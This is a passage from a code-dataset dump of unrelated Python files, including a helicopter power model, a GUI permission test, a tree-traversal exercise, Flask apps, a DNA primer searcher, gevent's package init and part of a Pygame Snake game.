Theory\" section 4.1.1)\n unknowns['lambda'] = unknowns['mu'] * math.tan(unknowns['alpha']) + unknowns['Ct'] / \\\n (2.0 * math.sqrt(unknowns['mu']**2.0 + unknowns['Ct']/2.0))\n for i in range(5):\n unknowns['lambda'] = (unknowns['mu'] * math.tan(unknowns['alpha']) + \\\n unknowns['Ct'] / 2.0 * (unknowns['mu']**2.0 + 2.0*unknowns['lambda']**2) / \\\n (unknowns['mu']**2.0 + unknowns['lambda']**2)**1.5) / \\\n (1.0 + unknowns['Ct']/2.0 * unknowns['lambda'] / (unknowns['mu']**2 + unknowns['lambda']**2.0)**1.5)\n unknowns['v'] = unknowns['lambda'] * unknowns['omega'] * params['rProp'] - params['V'] * math.sin(unknowns['alpha'])\n\n # Power in forward flight (see \"Helicopter Theory\" section 5-12)\n unknowns['PCruise'] = params['W'] * (params['V'] * math.sin(unknowns['alpha']) + 1.3 * math.cosh(8 * unknowns['mu']**2) * unknowns['v'] + \\\n unknowns['Cd0'] * unknowns['omega'] * params['rProp'] * \\\n (1 + 4.5 * unknowns['mu']**2 + 1.61 * unknowns['mu']**3.7) * \\\n (1 - (0.03 + 0.1 * unknowns['mu'] + 0.05 * math.sin(4.304 * unknowns['mu'] - 0.20)) * \\\n (1-math.cos(unknowns['alpha'])**2)) / 8 / (unknowns['Ct'] / unknowns['sigma']))\n\n # 10% power added for helicopter tail rotor\n unknowns['PCruise'] = 1.1 * unknowns['PCruise']\n\n # Equivalent L/D, assuming power = D * V and L = W\n unknowns['LoverD'] = params['W'] / (unknowns['PCruise'] / params['V'])\n\n # Battery power\n unknowns['PBattery'] = unknowns['PCruise'] / unknowns['etaMotor']\n\n else:\n pass\n\n\nif __name__ == \"__main__\":\n top = Problem()\n root = top.root = Group()\n\n # Sample Inputs\n indep_vars_constants = [('Vehicle', u'helicopter', {'pass_by_obj':True}),\n ('rProp', 1.4),\n ('V', 50.0),\n ('W', 2000.0)]\n\n root.add('Inputs', IndepVarComp(indep_vars_constants))\n\n root.add('Example', CruisePower())\n\n root.connect('Inputs.Vehicle', 'Example.Vehicle')\n root.connect('Inputs.rProp', 'Example.rProp')\n root.connect('Inputs.V', 'Example.V')\n root.connect('Inputs.W', 'Example.W')\n\n top.setup()\n top.run()\n \n print(\"Helicopter..\")\n print(\"PBattery:\", top['Example.PBattery'])\n print(\"etaProp:\", top['Example.etaProp'])\n print(\"etaMotor:\", top['Example.etaMotor'])\n print(\"CLmax:\", top['Example.CLmax'])\n print(\"bRef:\", top['Example.bRef'])\n print(\"SRef:\", top['Example.SRef'])\n print(\"cRef:\", top['Example.cRef'])\n print(\"AR:\", top['Example.AR'])\n print(\"D:\", top['Example.D'])\n print(\"PCruise:\", top['Example.PCruise'])\n print(\"PBattery:\", top['Example.PBattery'])\n print(\"Cd0:\", top['Example.Cd0'])\n print(\"CL:\", top['Example.CL'])\n print(\"LoverD:\", top['Example.LoverD'])\n print(\"omega:\", top['Example.omega'])\n print(\"alpha:\", top['Example.alpha'])\n print(\"mu:\", top['Example.mu'])\n print(\"Ct:\", top['Example.Ct'])\n print(\"lamda:\", top['Example.lambda'])\n print(\"v:\", top['Example.v'])\n print(\"SCdFuse:\", top['Example.SCdFuse'])\n print(\"Cd0Wing:\", top['Example.Cd0Wing'])\n print(\"e:\", top['Example.e'])\n print(\"B:\", top['Example.B'])\n print(\"sigma:\", top['Example.sigma'])\n \n \n # Example\n # top['Inputs.Vehicle'] = u'helicopter'\n \n # top.run()\n \n # print(\"Helicopter.. PBattery:\", top['Example.PBattery'])\n # print(\"Helicopter.. mu:\", top['Example.mu'])\n # print(\"Helicopter.. alpha:\", top['Example.alpha'])\n # print(\"Helicopter.. omega:\", top['Example.omega']) \n \n # top['Inputs.V'] = 30.0\n \n # top.run()\n # print(\"Inputs.V.. V:\", top['Inputs.V'])\n # print(\"Helicopter.. PBattery:\", top['Example.PBattery'])\n # print(\"Helicopter.. mu:\", top['Example.mu'])\n # print(\"Helicopter.. alpha:\", top['Example.alpha'])\n # print(\"Helicopter.. omega:\", top['Example.omega'])\n \n # top['Inputs.V'] = 80.0\n \n # top.run()\n # print(\"Inputs.V.. V:\", top['Inputs.V'])\n # print(\"Helicopter.. PBattery:\", top['Example.PBattery'])\n # print(\"Helicopter.. mu:\", top['Example.mu'])\n # print(\"Helicopter.. alpha:\", top['Example.alpha'])\n # print(\"Helicopter.. omega:\", top['Example.omega'])","sub_path":"scripts/cruise_power_what_if.py","file_name":"cruise_power_what_if.py","file_ext":"py","file_size_in_byte":11395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"40757630","text":"'''\nAuthor: P.Suman\nCreated Date: Nov 30, 2015\nDescription: Verify that while granting access of service, the Admin is unable to see all the Read-only \n users defined for the appliance.\n'''\nfrom tests.globalImports import *\n\ntc_id=utility.get_tc_data(__file__)\n\nclass Testcase(Manager.Manager): \n \"\"\"\n While granting access of service, the Admin is unable to see all the Read-only users defined for the appliance\n \"\"\"\n \n def __init__(self, *args, **kwargs):\n \"\"\"\n Initialization\n \"\"\"\n Manager.Manager.__init__(self, tc_id, *args, **kwargs) \n \n @BaseClass.TestBase.func_exec\n def test_functionality(self): \n \"\"\"\n This is the execution starting function\n \"\"\"\n serviceName=\"Test Service\"\n templateName = \"Test Template\"\n self.browserObject = globalVars.browserObject\n \n #Check for current logged in user\n self.verifyCurrentUser(userRole='Administrator', loginAsUser=True)\n \n #Creates Sample Template if not exists\n self.createSampleTemplate(templateName=templateName, publishedTemplate=True)\n \n #Check for user\n self.verifyCurrentUser(userRole='Read only', loginAsUser=False)\n \n #Get Service List\n serviceList = self.getServices(serviceName=serviceName)\n if len(serviceList) <= 0:\n self.deployService(templateName, serviceName)\n \n #Deploy Service\n userList = self.getUsersFromDeployService(templateName, serviceName)\n self.succeed(\"User List while Deploying Service :: %s\"%str(userList))\n checkReadonlyUsers = [user for user in userList if user[\"Role\"] == \"Read only\"]\n if len(checkReadonlyUsers) > 0:\n self.failure(\"Admin is able to see 'Read only' Users while Deploying Service :: %s\"%(str(checkReadonlyUsers)), \n raiseExc=True)\n else:\n self.succeed(\"Admin is not able to see any 'Read only' Users while Deploying Service\")","sub_path":"GUI/gui-automation-ASMvNext84UI/tests/rbac/Testcase_NGI_TC_2680.py","file_name":"Testcase_NGI_TC_2680.py","file_ext":"py","file_size_in_byte":2054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"530696594","text":"'''\n\nbinary trees\n\niterative in order traversal- gives you a BT, nodes have\nvalue property, integers, as well as parent node value,\nmeaning node has access to parent\n\nnodes have left and right child nodes\n\nquestion- traverse BT with in order traversal, gives you a\ncallback for each encounter, but wants you to do it iteratively\n\nin order means- constant space\n\nin order traversal means traversing:\n\nleft child\nnode\nright child\n\ncan't use recursive calls (a stack) or a queue, although what if\nyou used a queue that always had constant space\n\nin order to determine if the cb gets called, have to track current\nprevious, and next nodes\n\n\t\t1\n\t / \\\n\t 2 3 \n\t /\t / \\\n\t4 6 7\n\t \\\n\t 9\n\nin order results in: 4, 9, 2, 1, 6, 3, 7\n\nat root, previous is null, current is root, if left, next is left,\nif not, next is right\n\ntraverse left, then previous is the root (1), current is left child of\nroot (2)\n\nif previous node is current node's parent, then we need to continue\nexploring down \n\nif theres a left node, move down (4)\n\nsince there's no left child for 4, at 4 calls its callback before\nexploring its right child \n\nexplore the right child, 9, then call cb\n\nnow flip the pointers because 9 has no children , so previous is 9 and \ncurrent is 4\n\nsince previous node is a child, we know we're ascending, we know we\ncalled cb on the way down, so we keep going up\n\ncall cb on current node, 2, traverse up, call cb on 1\n\n'''\n\n# O(n) where n is number of nodes in BST\n# constant space- that's the point \n\ndef iterativeInOrderTraversal(tree, callback):\n\n\tpreviousNode = None\n\tcurrentNode = tree\n\n\t# if currentNode is None, we have traversed all the way\n\t# down and all the way to the right \n\twhile currentNode is not None:\n\n\t\t# we are descending the tree\n\t\tif previousNode.left is not None or previousNode == currentNode.parent:\n\n\t\t\t# descend left\n\t\t\tif currentNode.left is not None:\n\n\t\t\t\tnextNode = currentNode.left\n\n\t\t\t# descend right\n\t\t\telse:\n\t\t\t\t# call on node- \n\t\t\t\tcallback(currentNode)\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t# this only gets\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t# called once- after\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t# called, will fail\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t# the first conditional \n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t# above\n\t\t\t\tnextNode = currentNode.right if currentNode.right is not None else currentNode.parent\n\n\t\t# coming back from the left\n\t\telif previousNode == currentNode.left:\n\t\t\t\n\t\t\tcallback(currentNode)\n\t\t\tnextNode = currentNode.right if currentNode.right is not None else currentNode.parent\n\n\t\telif previousNode == currentNode.right:\n\n\t\t\tnextNode = currentNode.parent\n\n\t\tpreviousNode = currentNode\n\t\tcurrentNode = nextNode\n","sub_path":"inorderTraversalBT.py","file_name":"inorderTraversalBT.py","file_ext":"py","file_size_in_byte":2596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"404883962","text":"# -*- encoding: utf-8 -*-\n'''\n@File : run_MF.py\n@Time : 2021/04/01 16:32:06\n@Author : Liu Qidong\n@Version : 1.0\n@Contact : dong_liuqi@163.com\n'''\n\n# here put the import lib\nimport json\nimport torch\nfrom layers.input import *\nfrom utils.utils import *\nfrom dataset import RecRankTest, RecTest\nfrom model.MF import MF\n\n\ndef run_MF(args):\n\n with open('./data/' + args.dataset + '/info.json', 'r') as f:\n info = json.load(f)\n\n '''Step 1: Construct input module'''\n #在这里取全量特征, 可以在模型中构建输入模块的时候进行特征选择\n dense = [denseFeat(sf, info['vocabulary_size'][sf], \n info['feat_index'][sf], \n group_name=sf.split('_')[0]) \n for sf in info['feat_type']['cont']]\n sparse = [sparseFeat(sf, info['vocabulary_size'][sf], \n info['feat_index'][sf], \n group_name=sf.split('_')[0]) \n for sf in info['feat_type']['cate']]\n sequence = [sequenceFeat(sf, info['vocabulary_size']['item_' + sf.split('_')[1]], \n info['feat_index']['item_' + sf.split('_')[1]], \n group_name=sf.split('_')[0]) \n for sf in info['feat_type']['sequence']]\n feat_list = dense + sparse + sequence\n\n '''Step 2: select features for constructing model'''\n user_feat = ['user_id']\n item_feat = ['item_id']\n behavior_feat = []\n\n '''Step 3: construct model and use cuda'''\n model = MF(feat_list, args, use_bias=False)\n if args.use_cuda:\n device = torch.device('cuda:' + str(args.device_tab))\n model.to(device)\n\n '''Step 4: train model or load model'''\n if args.load_m:\n model = load_model(model, args)\n else:\n model.fit()\n\n '''Step 5: evaluation'''\n if args.es:\n model._load_model()\n test_set = RecTest(args)\n model.evaluate(test_set)\n test_rank = RecRankTest(args)\n model.rank_evaluate(test_rank, topk=10)\n\n\n\n\n\n\n\n\n\n\n","sub_path":"examples/run_MF.py","file_name":"run_MF.py","file_ext":"py","file_size_in_byte":1975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"189231551","text":"\"\"\"\nTests for the gait2392geomcustomiser.py module\n\"\"\"\nimport os\nimport sys\nimport numpy as np\nimport copy\nsys.path.append('../')\nimport gait2392geomcustomiser as g23\nfrom gias2.fieldwork.field import geometric_field\nfrom gias2.musculoskeletal.bonemodels import bonemodels\nreload(g23)\n\nfrom lltransform import LLTransformData\n\nSELF_DIRECTORY = os.path.split(__file__)[0]\n_shapeModelFilenameLeft = os.path.join(SELF_DIRECTORY, 'data/shape_models/LLP26_rigid.pc')\n_boneModelFilenamesLeft = {'pelvis': (os.path.join(SELF_DIRECTORY, 'data/atlas_meshes/pelvis_combined_cubic_mean_rigid_LLP26.geof'),\n os.path.join(SELF_DIRECTORY, 'data/atlas_meshes/pelvis_combined_cubic_flat.ens'),\n os.path.join(SELF_DIRECTORY, 'data/atlas_meshes/pelvis_combined_cubic_flat.mesh'),\n ),\n 'femur': (os.path.join(SELF_DIRECTORY, 'data/atlas_meshes/femur_left_mean_rigid_LLP26.geof'),\n os.path.join(SELF_DIRECTORY, 'data/atlas_meshes/femur_left_quartic_flat.ens'),\n os.path.join(SELF_DIRECTORY, 'data/atlas_meshes/femur_left_quartic_flat.mesh'),\n ),\n 'patella': (os.path.join(SELF_DIRECTORY, 'data/atlas_meshes/patella_left_mean_rigid_LLP26.geof'),\n os.path.join(SELF_DIRECTORY, 'data/atlas_meshes/patella_11_left.ens'),\n os.path.join(SELF_DIRECTORY, 'data/atlas_meshes/patella_11_left.mesh'),\n ),\n 'tibiafibula': (os.path.join(SELF_DIRECTORY, 'data/atlas_meshes/tibia_fibula_cubic_left_mean_rigid_LLP26.geof'),\n os.path.join(SELF_DIRECTORY, 'data/atlas_meshes/tibia_fibula_left_cubic_flat.ens'),\n os.path.join(SELF_DIRECTORY, 'data/atlas_meshes/tibia_fibula_left_cubic_flat.mesh'),\n ),\n }\n\ndef _outputModelDict(LL):\n outputModelDict = dict([(m[0], m[1].gf) for m in LL.models.items()])\n return outputModelDict\n\n\n# generate a custom left lower limb geometry\nll_params = ([1.0,],[0,], [0,0,0,0,0,0], [0.0,0.0,0.0],[-np.pi/4])\nLL = bonemodels.LowerLimbLeftAtlas('lower_limb_left')\nLL.bone_files = _boneModelFilenamesLeft\nLL.combined_pcs_filename = _shapeModelFilenameLeft\nLL.load_bones()\nLL.update_all_models(*ll_params)\ninputModelDict = _outputModelDict(LL)\n# inputModelDict['femur-left'] = inputModelDict['femur']\n# inputModelDict['tibiafibula-left'] = inputModelDict['tibiafibula']\n\nllt = LLTransformData()\nllt.pelvisRigid = ll_params[2]\nllt.hipRot = ll_params[3]\nllt.kneeRot = ll_params[4]\n\n# test config file\noutput_dir = str(os.path.join(os.path.split(__file__)[0], 'output/'))\nconfig = {'osim_output_dir': output_dir,\n 'convert_mm_to_m': True,\n 'scale_other_bodies': False,\n 'write_osim_file': True,\n }\n\n# instantiate customiser\ncust = g23.Gait2392GeomCustomiser(config)\ncust.set_left_lowerlimb_gfields(inputModelDict)\ncust.ll_transform = llt\n\n# customise each bone\n# cust.cust_osim_pelvis()\n# cust.cust_osim_femur_left()\n# cust.cust_osim_tibiafibula_left()\n# cust.cust_osim_ankle_left()\ncust.customise()\n\n# print('writing')\n# write out customised osim file\n# cust.write_cust_osim_model()\n\n\nknee_angles = g23.calc_knee_angles(cust.LL)\nprint(knee_angles)","sub_path":"server/backend/geom/testing/gait2392geomcustomiser_test.py","file_name":"gait2392geomcustomiser_test.py","file_ext":"py","file_size_in_byte":3475,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"521329054","text":"from flask import Flask, render_template, request, jsonify\nimport numpy as np\nimport cv2\n#import keras.models\nimport re\nimport sys\nimport os\nfrom io import BytesIO\n#Set Model Path\nsys.path.append(os.path.abspath('./model'))\nfrom model_loader import *\n\napp = Flask(__name__)\napp.config['UPLOAD_FOLDER'] = 'static'\nglobal model, graph\nmodel, graph = init_models()\n\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n@app.route('/upload', methods=['POST'])\ndef upload():\n file = request.files['file']\n image = cv2.imdecode(np.fromstring(BytesIO(file.read()).getvalue(), dtype=np.uint8), 1)\n image = image[:, :, ::-1]\n print(\"Uploaded\")\n pred, width, height = predict_image(image)\n print(\"Predicted\")\n return jsonify({'width': width, 'height' : height, 'preds' : pred.tolist() })\n\ndef predict_image(image):\n overlay = np.ones([int(image.shape[0] / 165), int(image.shape[1] / 165)])\n with graph.as_default():\n width = image.shape[0] / 165\n height = image.shape[1] / 165\n for i in range(int(width)):\n for j in range(int(height)):\n xi = image[i * 165: (i + 1) * 165, j * 165: (j + 1) * 165] / 255\n xi = xi.reshape(1, 165, 165, 3)\n out = model.predict(xi)\n result = np.argmax(out)\n overlay[i, j] = result\n return overlay, int(width), int(height)\n\nif __name__ == '__main__':\n port = int(os.environ.get('PORT', 8085))\n app.run(host='127.0.0.1', port=port)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1510,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"292587425","text":"\n\nfrom xai.brain.wordbase.nouns._referee import _REFEREE\n\n#calss header\nclass _REFEREES(_REFEREE, ):\n\tdef __init__(self,): \n\t\t_REFEREE.__init__(self)\n\t\tself.name = \"REFEREES\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"referee\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_referees.py","file_name":"_referees.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"600014821","text":"import pandas as pd\nimport re\nimport os\nfrom flask import current_app, flash\n\nfrom flaskr.framework.model.Io.txt_file import TXTFILE\nfrom flaskr.framework.exception import InvalidArgument\nfrom flaskr.genomics.model.helper import get_reverse\n\n\nclass Searcher():\n def __init__(\n self,\n ):\n self.sequence = ''\n self.location = -1\n self.ignore_location = -1\n self.primer = ''\n self.reverse = False\n self.request = None\n self.max_line_checks = 5\n\n def execute(self, request):\n self.request = request\n\n primers = self.get_primers()\n\n fasta_files = []\n try:\n for file in self.request.files.getlist(\"fastafile[]\"):\n fasta_files.append(TXTFILE(file))\n except InvalidArgument:\n flash('An invalid file was provided, please make sure you are uploading a .txt file', 'error')\n return None\n\n result_string = ['']\n for p, primer in enumerate(primers):\n primer = primer.lower()\n self.primer = primer\n result_string.append('Primer: ' + self.primer)\n flash('Primer: ' + self.primer)\n\n for file in fasta_files:\n result_string.append('File: ' + file.name)\n flash('File: ' + file.name)\n\n search_count = 0\n self.reverse = False\n self.location = -1\n primer_not_found = False\n\n for idx, (name, self.sequence) in enumerate(file.read()):\n try:\n re.match(\"[AaTtGgCc]*\", self.sequence)\n except TypeError:\n flash('invalid sequence format, please check your primer sequence and try again', 'error')\n result_string.append('invalid sequence format, please check your primer sequence and try again')\n current_app.logger.error(\"invalid sequence, please check primer sequence %s and try again\"\n % name)\n break\n\n if self.reverse:\n get_reverse(self)\n\n # find location of primer\n if search_count < 3: # only search first 3 sequences for the primer location\n search_count += 1\n if not self.get_location():\n primer_not_found = True\n continue\n else:\n search_count = 0\n elif primer_not_found:\n break\n self.sequence = self.sequence[self.location:self.location + len(self.primer)]\n\n # search aligned location for differences\n differences = []\n if primer not in self.sequence and self.location > -1:\n for seq_idx, letter in enumerate(self.sequence):\n if letter != self.primer[seq_idx] and letter != 'n':\n differences.append(\n 'position %s, change from %s -> %s' % (\n str(seq_idx), str(primer[seq_idx]), str(letter)))\n\n if len(differences) > len(primer)/2:\n # probably identified the wrong location if the next sequences aren't even close\n self.reset_location()\n current_app.logger.error('There may be an error in the primer %s found in file %s, more'\n 'than half the located alignment differs from the expected primer'\n % (self.primer, file.name))\n continue\n\n if len(differences) > 0:\n result_string.append(' ' + name + '')\n result_string.append(' ' + ''.join(differences))\n result_string.append('')\n flash(name)\n flash(''.join(differences))\n\n if primer_not_found:\n result_string.append(' not found')\n flash(' not found')\n result_string.append('---------------------------------------')\n flash('---------------------------------------')\n\n for file in fasta_files:\n file.delete()\n return result_string\n\n def get_primers(self):\n if not self.request.files.get('primer_list'):\n primer_file = os.path.join(current_app.static_folder, 'files', 'primers.xlsx')\n else:\n primer_file = self.request.files['primer_list']\n df = pd.read_excel(primer_file, sheet_name='Sheet1')\n return df['Sequence']\n\n def reset_location(self):\n self.ignore_location = self.location\n self.location = -1\n self.get_location()\n\n def get_location(self):\n if self.location >= 0:\n return True\n\n if self.primer in self.sequence:\n self.location = self.sequence.find(self.primer)\n return True\n\n get_reverse(self)\n if self.primer in self.sequence:\n self.location = self.sequence.find(self.primer)\n self.reverse = True\n return True\n\n # TODO: only identifying strings with less than 4 character differences from the primer\n # TODO: also this makes the program SLOW!\n wild_cards = 1\n while not self.get_wild_card_primer(wild_cards):\n get_reverse(self)\n wild_cards += .5\n\n if wild_cards >= 4:\n return False\n\n return False\n\n def get_wild_card_primer(self, wild_cards):\n wild_cards = int(wild_cards)\n num_letters = len(self.primer)\n\n for idx in range(num_letters):\n wild_primer = self.primer[:idx] + '.' + self.primer[idx + 1:]\n if wild_cards == 1:\n single_wild = re.compile(wild_primer)\n search = re.search(single_wild, self.sequence)\n if search is not None and self.location != self.ignore_location:\n self.location = search.span(0)[0]\n return True\n\n elif wild_cards == 2:\n for idx2 in range(idx + 1, num_letters):\n double_wilds = re.compile(wild_primer[:idx2] + '.' + wild_primer[idx2 + 1:])\n search = re.search(double_wilds, self.sequence)\n if search is not None and self.location != self.ignore_location:\n self.location = search.span(0)[0]\n return True\n\n elif wild_cards == 3:\n for idx2 in range(idx + 1, num_letters):\n double_wilds = wild_primer[:idx2] + '.' + wild_primer[idx2 + 1:]\n for idx3 in range(idx2 + 1, num_letters):\n triple_wilds = re.compile(double_wilds[:idx3] + '.' + double_wilds[idx3 + 1:])\n search = re.search(triple_wilds, self.sequence)\n if search is not None and self.location != self.ignore_location:\n self.location = search.span(0)[0]\n return True\n\n return False\n","sub_path":"flaskr/genomics/model/searcher.py","file_name":"searcher.py","file_ext":"py","file_size_in_byte":7391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"114427593","text":"# coding: utf-8\nfrom __future__ import absolute_import\n\n\n__all__ = ['get_hub',\n 'Greenlet',\n 'GreenletExit',\n 'spawn',\n 'spawn_later',\n 'spawn_raw',\n 'iwait',\n 'wait',\n 'killall',\n 'Timeout',\n 'with_timeout',\n 'getcurrent',\n 'sleep',\n 'idle',\n 'kill',\n 'signal',\n 'fork',\n 'reinit']\n\n\nimport sys\nif sys.platform == 'win32':\n import socket\n del socket\n\nfrom gevent.hub import get_hub, iwait, wait\nfrom gevent.greenlet import Greenlet, joinall, killall # 对于greenlet原生的包装\njoinall = joinall\nspawn = Greenlet.spawn\nspawn_later = Greenlet.spawn_later\n\nfrom gevent.timeout import Timeout, with_timeout\nfrom gevent.hub import getcurrent, GreenletExit, spawn_raw, sleep, idle, kill, reinit\ntry:\n from gevent.os import fork\nexcept ImportError:\n __all__.remove('fork')\n\n\nfrom gevent.hub import signal as _signal_class\nfrom gevent import signal as _signal_module\nclass _signal_metaclass(type):\n\n def __getattr__(cls, name):\n return getattr(_signal_module, name)\n\n def __setattr__(cls, name, value):\n setattr(_signal_module, name, value)\n\n def __instancecheck__(cls, instance):\n return isinstance(instance, _signal_class)\n\n def __dir__(cls):\n return dir(_signal_module)\nclass signal(object):\n\n __doc__ = _signal_module.__doc__\n\n def __new__(cls, *args, **kwargs):\n return _signal_class(*args, **kwargs)\nsignal = _signal_metaclass(str(\"signal\"), (), dict(signal.__dict__))\nsys.modules['gevent.signal'] = signal\nsys.modules['gevent.hub'].signal = signal\ndel sys","sub_path":"src/gevent/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"129756680","text":"\"\"\"\n如果在 try 子句执行过程中发生了异常,\n如果异常匹配于 except 关键字后面指定的异常类型,就执行对应的 except 子句。\n然后继续执行 try 语句之后的代码。\n\"\"\"\n\ndef get_number():\n \"return a float number\"\n number = float(input(\"Enter a float number: \"))\n return number\n\nwhile True:\n try:\n print(get_number())\n except ValueError:\n print(\"You antered a wrong value\")\n","sub_path":"异常/except_something.py","file_name":"except_something.py","file_ext":"py","file_size_in_byte":447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"558740633","text":"from flask import jsonify, request, Blueprint\nfrom requests import get\n\n\nMAX_CALLS = 30\nBASE_URL = 'https://www.themuse.com/api/public/'\n\nbp = Blueprint('blueprint', __name__)\n\n\n@bp.route('/load', methods=['GET'])\ndef get_companies():\n all_companies = []\n for i in range(MAX_CALLS):\n r = get(f'{BASE_URL}companies', params={'page': i})\n data = r.json()\n all_companies.extend(data.get('results'))\n if data.get('page_count') == i:\n break\n industries, locations = format_data(all_companies)\n return jsonify({'company_industries': industries, 'company_locations': locations}), 200\n\n\n@bp.route('/', defaults={'path': ''})\n@bp.route('/')\ndef proxy(path):\n path = path.strip('/')\n r = get(f'{BASE_URL}{path}', params=request.args)\n # return jsonify(r.json()['results']), 200\n return jsonify(r.json()), 200\n\n\ndef format_data(companies):\n all_locations = set()\n all_industries = set()\n\n for company in companies:\n locations = list(map(lambda x: x.get('name'), company.get('locations')))\n industries = list(map(lambda x: x.get('name'), company.get('industries')))\n\n all_locations.update(locations)\n all_industries.update(industries)\n\n return list(all_industries), list(all_locations)\n","sub_path":"app/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":1288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"644526756","text":"#Ivana Olvera Mérida A01746744\r\n#PROYECTO FINAL: Integrar todos los conocimientos aprendidos\r\n#durante el curso para crear un videojuego sencillo en Python.\r\n#Videojuego: SNAKE\r\n\r\nimport pygame\r\nimport random\r\n\r\n#Dimensiones de la pantalla\r\nfrom pygame.sprite import Sprite\r\n\r\nANCHO = 800\r\nALTO = 600\r\n#Colores\r\nBLANCO = (255, 255, 255)\r\nVERDE_BANDERA = (27, 94, 32)\r\nROJO = (255, 0, 0)\r\nAZUL = (0, 0, 255)\r\nAMARILLO = (239, 239, 4)\r\nNEGRO = (0, 0, 0)\r\n\r\n\r\ndef checarColisiones(listaComida, listaSerpiente):\r\n estatus = False #El estado comienza como FALSE = 0\r\n for serpiente in listaSerpiente:\r\n borrarComida = False\r\n for k in range(len(listaComida) - 1, -1, -1):\r\n comida = listaComida[k]\r\n xb, yb, ab, alb = serpiente.rect\r\n xe, ye, ae, ale = comida.rect\r\n if (xe == xb and yb == ye and ab == ae and alb == ale):\r\n estatus = True\r\n borrarComida = True\r\n if borrarComida == True: #Si la serpiente choca con la comida, el estado de borrarComida se vuelve TRUE\r\n listaComida.pop() #Va a eliminar el dato que se tiene\r\n\r\n if estatus == True: #Si el estado pasa a ser TRUE (choque entre la serpiente y la comida), se regresará un punto. En caso de no ser así, se mantiene en 0\r\n return 1\r\n else:\r\n return 0\r\n\r\ndef dibujarSerpiente(ventana, listaSerpiente):\r\n for serpiente in listaSerpiente:\r\n ventana.blit(serpiente.image, serpiente.rect) #Dibuja la imagen de la serpiente junto con sus dimensiones\r\n\r\ndef dibujarComida(ventana, listaComida):\r\n for comida in listaComida:\r\n ventana.blit(comida.image, comida.rect) #Dibuja la imagen de la comida junto con sus dimensiones\r\n\r\ndef dibujarMouse(ventana, xMouse, yMouse):\r\n if xMouse != -1:\r\n pygame.draw.circle(ventana, BLANCO, (xMouse, yMouse), 50) #Se dibuja un círculo blanco en caso de que no se haga clic en la zona establecida\r\n\r\ndef dibujarFondoMenu(ventana, fondoMenu): #Dibujar el fondo del menú principal\r\n ventana.blit(fondoMenu, (0, 0))\r\n\r\ndef dibujarBotonJugar(ventana, botonJugar): #Se muestra el botón de jugar en el menú\r\n ventana.blit(botonJugar, (125, 300))\r\n\r\ndef dibujarBotonPuntuaciones(ventana, botonPuntos): #Se muestra el botón de puntuaciones en el menú\r\n ventana.blit(botonPuntos, (125, 360))\r\n\r\ndef dibujarBotonInfo(ventana, botonInfo): #Se muestra el botón de información en el menú\r\n ventana.blit(botonInfo, (125, 420))\r\n\r\ndef dibujarFondo(ventana, fondo):\r\n ventana.blit(fondo, (0, 0))\r\n\r\ndef dibujarBotonMenu(ventana, botonMenu):\r\n ventana.blit(botonMenu, (625, 465))\r\n\r\ndef dibujarBotonMenuJugar(ventana, botonMenuJuego): #Se dibuja el botón de menú dentro del juego\r\n ventana.blit(botonMenuJuego, (675, 525))\r\n\r\ndef cuadricula(ventana): #Dibujar la cuadrícula que será el fondo del juego mientras ESTADO = JUGANDO\r\n xInicial= 0\r\n xFinal= 800\r\n y= 0\r\n x= 0\r\n yInicial= 0\r\n yFinal= 500\r\n i= 0\r\n k= 0\r\n for i in range(1,12,1):\r\n pygame.draw.line(ventana,BLANCO,(xInicial,y),(xFinal,y), 1)\r\n y = y + 50\r\n i = i + 1\r\n for k in range(1,17,1):\r\n pygame.draw.line(ventana,BLANCO,(x,yInicial),(x,yFinal), 1)\r\n x = x + 50\r\n k = k + 1\r\n\r\ndef dibujarMarcador(ventana, comidos, fuente):\r\n texto = fuente.render(\"Puntuación: \" + str(comidos), 1, BLANCO)\r\n ventana.blit(texto, (60,545))\r\n\r\ndef registrarPuntos(puntos): #Se registrarán los puntajes de los jugadores\r\n salida = open(\"Puntuaciones.txt\", \"w\", encoding=\"UTF-8\")\r\n salida.write(\"%s, %d\\n\" % (puntos))\r\n\r\n\r\ndef crearComida(listaComida, imgComida):\r\n Comida = pygame.sprite.Sprite()\r\n Comida.image = imgComida\r\n Comida.rect = imgComida.get_rect()\r\n Comida.rect.left = random.choice((0, 50, 100, 150, 200, 250, 300, 350, 400, 450, 500, 550, 600, 650, 700, 750)) #Rango de la cuadrícula en el que puede aparecer aleatoriamente la comida\r\n Comida.rect.top = random.choice((0, 50, 100, 150, 200, 250, 300, 350, 400, 450)) #Rango de la cuadrícula en el que puede aparecer aleatoriamente la comida\r\n listaComida.append(Comida)\r\n\r\n\r\n\r\ndef moverSerpiente(listaSerpiente, coordenadaX, coordenadaY, listaComida):\r\n cabeza = listaSerpiente[:][0] #Copia\r\n auxiliar = 